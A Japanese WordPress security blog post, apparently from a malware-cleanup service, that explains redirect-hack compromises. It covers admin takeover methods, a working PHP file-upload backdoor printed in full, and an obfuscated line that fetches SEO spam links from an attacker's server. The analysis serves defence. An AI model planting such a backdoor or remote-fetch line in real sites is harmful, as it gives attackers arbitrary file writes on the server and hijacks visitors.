ワードプレスドクターが復旧してきたマルウェア改ざんを受けているサイト様で、最近特に多くのサイト様が被害を受けているリダイレクトハック(サイトがアクセスしてきたユーザーが中国のサイトやセキュリティーサイト等に勝手に誘導されてしまうサイトの改ざん)がどのようなコードになっていて、そのコードがサイトにどのように作用しているのかを解説したく思います。


前提条件 ワードプレスの管理者権限を奪取するハッカー

ハッカーは下記のような手法でまずワードプレスの管理者権限を奪取します。

●総当たりでパスワードをログイン画面に入力、ログイン施行を繰り返し管理者権限を奪取する(ソフトウェアで自動化されています)
●プラグインやテーマ、ワードプレス本体の脆弱性を利用して管理者権限を奪取する
●wp-config.phpの設定の不備(認証用ユニークキーが設定されていないなど)を利用して管理者権限を奪取する

ワードプレスには管理画面からのファイルの変更機能がついていますのでこの機能を利用して悪意のあるコードをサイトに埋め込んできます。

どのページにアクセスしてもユーザーを別のドメインのページにリダイレクトする改ざん被害

検索エンジン経由など様々なページにアクセスしてきたユーザーをリダイレクトするには、ワードプレスで必ず読み込まれるファイルにリダイレクトの為のコードをハッカーが仕込まなくてはいけません。
ワードプレスに含まれるファイルで、必ずサイト表示時に読み込まれる代表的なファイルはindex.php,wp-config.phpやテーマに含まれる、header.php,footer.phpなどがあり、最もハッカーが改ざんを埋め込んでいる確率が高いファイルとなっています。

上の画像は実際に改ざんのコードがwp-config.phpに埋め込まれている状態のキャプチャです。
@includeという命令で何らかのファイルを別所から読み込んで実行していることがわかります。多くの場合マルウェアのコードはこのように難読化され処理内容がわからないようになっています。

任意のファイルをサーバーにアップロードできるファイルをサイトに設置

昨今流行しているリダイレクトハックには、必ず下記のようなコードのファイルがサーバー中に含まれています。プラグインに偽装したり、wpcsesapps.phpというファイルでwp-contentフォルダの中に置かれていたりします。

if (isset($_POST['upload'])){
	if ($_POST['upload']=='1'){
		$uploadfile = $_POST['path'].$_FILES['uploadfile']['name'];
		if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $uploadfile))
			{echo 'ok';}
		else {echo $_FILES['uploadfile']['error'];}
		}
	if ($_POST['upload']=='2'){
		$fp=fopen($_POST['path'],'a');  
		fwrite($fp, "\r\n");
		fwrite($fp, $_POST['uploadfile']);
		fclose($fp);
		echo 'ok';
		}
	}
else {header('Location: ../../');}

このコードはいかなるファイルもサーバーに外部からアップロードできてしまう大変危険なコードで、バックドアと呼ばれハッカーの改ざんの入り口となるものです。
このファイルは難読化されておらず、難読化されたコードを発見するマルウェアスキャナーで検出できないようになっています。

サイトのページ内のすべてのリンクに不正なサイトにリダイレクトするコードの埋め込み

またテーマのfooter.phpというファイルに不正なJavascriptコードを埋め込むことによってサイトの任意のページのリンクをクリックした瞬間にユーザーを別のサイトにリダイレクトする改ざんを受けている事例もございました。

※XXXXXの部分は不正時としています

このコードは、サイト中に含まれるすべてのリンクに対して、別サイトへユーザーがジャンプするような偽のリンクを仕込みます。また、数時間に一回しか発動しないようにCOOKIEを利用してすでにリダイレクトされたユーザーには一定時間この機能が発動しないようになっている大変巧妙なコードです。

同様の改ざんを受けている別のサイトへのリンクを任意のキーワードで行う

最後にこのリダイレクトハックに共通する特徴としてSEOハックと呼ばれる改ざんも含まれることが挙げられます。
SEOハックとは、検索エンジンが被リンクの量でサイトの検索エンジンの上位に検索結果を持ってくる仕組みを悪用して、悪意のあるコードが含まれるサイトへのリンクをそのサイトの管理者が関知しないように、こっそりとサイトに埋め込むことです。
このリンクの出力の為にハッカーは下記のような改ざんをサイトに埋め込みます

※XXXXXの部分は不正時としています。

@file_get_contents(str_rot13("uggc://scrq8.bet/xxxxxxx"));

このコードはハッカーが所有しているサーバーからSEOハックを行うためのリンクリストをリアルタイムに取得しており、ハッカーが好きなタイミングでSEOハックによって検索エンジンに表示したいサイトのURLを設定できるようになっています。
このようにして取得されたリストは知らず知らずのうちに、改ざんを受けたサイトの中で出力され、検索エンジンがそれを拾ってしまうようになっています。

参考記事
ワードプレス改ざんの復旧:5000件以上のハッキングされたワードプレスサイトのリストを発見

リダイレクトハックのマルウェアを検出するには?

ワードプレスドクターが作ったリダイレクトハックのマルウェアを検出できるプラグインはこちらからご利用ください
【無料】WPドクター:マルウェアスキャン プラグイン

WordPress のマルウェア駆除、セキュリティー対策のご相談・ご依頼はWPドクターまでお気軽にどうぞ

関連記事:

  1. ワードプレスマルウェア ls-oembedプラグインの被害が拡大しています
    最近多数のお客様から同様のマルウェア被害についてのご相談が寄せられ、ワードプレスドクターで修正させていただいておりますのでこちらのマルウェアの排除の依頼事例についてご紹介させていただきます。 こちらの事例では共通して ls-oembedというプラグインが知らず知らずのうちにインストールされバックドアとなっているという共通点がございます。...
  2. ワードプレス改ざんの復旧:5000件以上のハッキングされたワードプレスサイトのリストを発見
    ワードプレスドクターのセキュリティー対策室にて、お客様のハッキング被害を修復する過程で、弊社では5000件以上のハッキングされたワードプレスサイトのURLを発見いたしました。この度はこの依頼事例からハッキングされたサイトリストを取得するに至った、顛末をご報告したく思います。 同一の手法による改ざん被害で、一度に発見されたワードプレスサイトの被害規模としては世界最大クラスかと存じますので公益性が高いかと考えまして事例を記載いたします。...
  3. ワードプレス WEBバックドアとは?その危険性や手法を解説いたします
    バックドアとは コンピュータセキュリティ用語としてのいわゆるバックドアは、本来はIDやパスワードを使って使用権を確認するコンピュータの機能を無許可で利用するために、コンピュータ内に(他人に知られることなく)設けられた通信接続の機能を指す。 引用 Wikipedia...
  4. ワードプレスのセキュリティー向上ープラグインの脆弱性編
    ワードプレスのハッキングの方法としてよく使われる手法の一つがプラグインの脆弱性を突くことです。 プラグインの脆弱性は深刻な物から、スパムメールにリンクを記載してリダイレクトを行うだけのような軽度のものまでさまざまなものがございます。 今回は最も深刻な脆弱性、Arbitrary...
  5. ワードプレス 稀に、Google検索結果からのみサイトが別のサイトに飛ばされるリダイレクトハック
    ワードプレスが検索エンジンからの検索結果からジャンプしたときのみ、稀に(スマホだけというパターンもあります)別の不正なサイトに強制的に移動してしまうリダイレクトハックの解説と対処方法について解説いたします。...